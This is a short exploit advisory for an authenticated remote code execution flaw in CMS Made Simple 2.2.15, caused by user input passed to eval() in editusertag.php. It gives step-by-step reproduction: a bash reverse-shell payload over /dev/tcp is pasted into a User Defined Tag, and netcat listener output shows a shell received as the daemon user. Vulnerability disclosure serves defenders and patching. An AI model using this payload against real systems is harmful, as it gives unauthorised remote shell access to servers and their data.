# Exploit Title: CMS Made Simple 2.2.15 - RCE (Authenticated)  
# Author: Andrey Stoykov  
# Vendor Homepage:  
# Software Link:  
# Version: 2.2.15  
# Tested on: Debian 10 LAMPP  
# Exploit and Detailed Info:  
Vulnerability is present at "editusertag.php" at line #93 where the user input is in eval() PHP function.  
// Vulnerable eval() code  
if (eval('function testfunction'.rand().'() {'.$code."\n}") === FALSE) {  
Reproduction Steps:  
1. Login as administrator user and navigate to Extensions->User Defined Tags  
2. Add code with the payload of:  
exec("/bin/bash -c 'bash -i > /dev/tcp/ 0>&1'");  
3. Click on the newly created User Defined Tag and use the Run function  
RCE will be achieved:  
astoykov@Lubuntu:~$ nc -kvlp 4444  
nc: getnameinfo: Temporary failure in name resolution  
Connection received on 53690  
uid=1(daemon) gid=1(daemon) groups=1(daemon)